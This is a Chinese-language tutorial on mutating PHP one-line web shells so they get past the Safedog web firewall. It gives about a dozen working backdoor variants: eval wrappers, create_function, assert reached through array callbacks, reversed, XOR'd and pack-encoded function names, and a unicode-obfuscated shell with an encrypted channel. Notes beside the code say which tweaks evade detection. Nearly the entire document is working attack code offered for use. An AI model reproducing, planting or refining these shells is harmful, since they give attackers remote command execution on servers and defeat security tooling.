前言:变形绕过安全狗的方法
普通一句话
<?php eval($_POST[cmd])?>变形一:函数调用
<?php
function fucksafedog($a,$b){
eval($a);
}
fucksafedog($_POST[cmd],'这是一个bypass示例');
?>
此方法第二个参数$b,并没有实际意义,只是用来干扰,不加会被杀
<?php $st=@create_function('',$_GET['cmd']);$st();?>变形二:回调
<?php
$newfunc = create_function('', "$_POST[cmd];");
$newfunc();
?>第二个参数这里加了双引号,加了就过狗,不加就不过
变形三: array_map 变形
<?php
array_map(strrev(substr('fucksafedog.cntressa', 8)),$_POST);
?>
此变形传值的时候,首先是截取,然后再反转可,以直接菜刀连接,密码任意,这里接受的是$_POST数组,所以,传什么都可以。
变形四:call_user_func
<?php
call_user_func(strrev(substr("fucksafedog.cn|tressa",9)),$_POST[cmd]);
?>
这个变形和上个变形类似,但是不同的地方,必须指定密码,否则不执行。
变形五:array_filter
<?php
$a = $_POST[cmd];
$arr = array($a);
array_filter($arr,'a'.'s'."serT");
?>变形六:array_udiff_assoc
<?php
$password="cmd";
array_udiff_assoc(array($_REQUEST[$password]),array(1),"assert");
?>这里变形注意PHP版本(php 5 > = 5 . 4 . 0 , php 7 )
变形七:array_intersect_ukey
第一个
<?php
$password="cmd";
$ch=explode(".","hello.ass.world.er.t");
register_shutdown_function($ch[1].$ch[3].$ch[4],$_REQUEST[$password]);
?>第二个
<?php
$password="cmd";
$ch=explode(".","hello.ass.world.er.t");
array_intersect_ukey(array($_REQUEST[$password]=>1),array(1),
$ch[1].$ch[3].$ch[4]);
?>变形八:rename
<?php
$password="cmd";
${"cmd"}=substr(__FILE__,-5,-4)."class";
$f=$cmd ^ hex2bin("12101f040107");
array_intersect_uassoc(array($_REQUEST[$password]=>""),array(1),$f);
?>变形九:异或
<?php
$password="cmd";
$key=substr(__FILE__,-5,-4);
${"cmd"}=$key."Land!";
$trick=array(
"0"=>"51","1"=>"50","2"=>"53","3"=>"52","4"=>"55","5"=>"54","6"
=>"57","7"=>"56","8"=>"59",
"9"=>"58","a"=>"00","b"=>"03","c"=>"02","d"=>"05","e"=>"04","f"
=>"07","g"=>"06","h"=>"09",
"i"=>"08","j"=>"0b","k"=>"0a","l"=>"0d","m"=>"0c","n"=>"0f","o"
=>"0e","p"=>"11","q"=>"10",
"r"=>"13","s"=>"12","t"=>"15","u"=>"14","v"=>"17","w"=>"16","x"
=>"19","y"=>"18","z"=>"1b",
"A"=>"20","B"=>"23","C"=>"22","D"=>"25","E"=>"24","F"=>"27","G"
=>"26","H"=>"29","I"=>"28",
"J"=>"2b","K"=>"2a","L"=>"2d","M"=>"2c","N"=>"2f","O"=>"2e","P"
=>"31","Q"=>"30","R"=>"33",
"S"=>"32","T"=>"35","U"=>"34","V"=>"37","W"=>"36","X"=>"39","Y"
=>"38","Z"=>"3b",
);
$f=pack("H*",$trick[$key]."3f120b1655")^$key."Land!";
array_intersect_uassoc(array($_REQUEST[$password]=>""),array(1),$f);
?>变形十:文件名最后字母为r
<?php
$password="cmd";
$key=substr(__FILE__,-5,-4);
${"cmd"}=$key."Land!";
$f=pack("H*","13"."3f120b1655")^$LandGrey;
array_intersect_uassoc(array($_REQUEST[$password]=>""),array(1),$f);
?>此外携带请求头 Accept: r也可
<?php
$password="cmd";
$key=substr(__FILE__,-5,-4);
${"cmd"}=$_SERVER["HTTP_ACCEPT"]."Land!";
$f=pack("H*","13"."3f120b1655")^$LandGrey;
array_intersect_uassoc(array($_REQUEST[$password]=>""),array(1),$f);
?>变形十一:unicode
<?php
@error_reporting(0);
session_start();
//unicode解码函数
function xx($unicode_str){
$json = '{"str":"'.$unicode_str.'"}';
$arr = json_decode($json,true);
if(empty($arr)) return '';
return $arr['str'];}
if (isset($_GET['pass']))
{
//调用解码函数返回原函数字符
$key=xx("u0073u0075u0062u0073u0074u0072")(xx("u006du0064u0035")(xx("u0075u006eu0069u0071u0069u0064")(xx("u0072u0061u006eu0064")())),16);
$_SESSION['k']=$key;
print $key;
}
else
{
$key=$_SESSION['k'];
$post=xx("u0066u0069u006cu0065u005fu0067u0065u0074u005fu0063u006fu006eu0074u0065u006eu0074u0073")(xx("u0070u0068u0070u003au002fu002fu0069u006eu0070u0075u0074"));
if(!xx("u0065u0078u0074u0065u006eu0073u0069u006fu006eu005fu006cu006fu0061u0064u0065u0064")('openssl'))
{
$t=xx("u0062u0061u0073u0065u0036u0034u005f").xx("u0064u0065u0063u006fu0064u0065");
$post=$t($post."");for($i=0;$i<xx("u0073u0074u0072u006cu0065u006e")($post);$i++) {
$post[$i] = $post[$i]^$key[$i+1&15];
}
}
else
{
$post=xx("u006fu0070u0065u006eu0073u0073u006cu005fu0064u0065u0063u0072u0079u0070u0074")($post,xx("u0041u0045u0053u0031u0032u0038"), $key);}$arr=xx("u0065u0078u0070u006cu006fu0064u0065")('|',$post);
$func=$arr[0];
$params=$arr[1];
class C{public function __invoke($p) {eval($p."");}}
@xx("u0063u0061u006cu006cu005fu0075u0073u0065u0072u005fu0066u0075u006eu0063")(new C(),$params);
}
?>变形十二:callback
<?php @header_register_callback($_GET['cmd']);?>